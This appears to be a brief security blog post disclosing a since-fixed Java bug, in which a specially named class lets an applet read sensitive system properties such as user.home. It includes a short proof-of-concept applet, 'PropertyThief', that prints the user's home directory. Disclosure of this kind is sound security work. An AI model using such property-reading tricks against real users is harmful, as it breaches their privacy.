It's also the least serious of the bugs so I'm not terribly upset that it took close to a year to fix.
com.sun.media.sound.JDK13Services has a public, static method called getDefaultProviderClass which takes a Class object as a parameter and it returns the system property which corresponds with the full class name. The problem is (was) that you can create your own classes whose names coincide with security sensitive property names, such as user.home, user.name, etc.
The implication is one of privacy.
An example of reading the user.home property and outputting it to System.out in an applet.
001 package user;
002
003 public class PropertyThief extends java.applet.Applet {
004
005 public void start() {
006 String usrHome = com.sun.media.sound.JDK13Services.getDefaultProviderClassName(user.home.class);
007 System.out.println(usrHome);
008 }
009 }
010
011 class home {}
This'll only work in a pre-update-15 Java. From the quick look into the new rt.jar bytecode, it looks like they're doing a bunch of if's now to limit the properties you can request.
No comments:
Post a Comment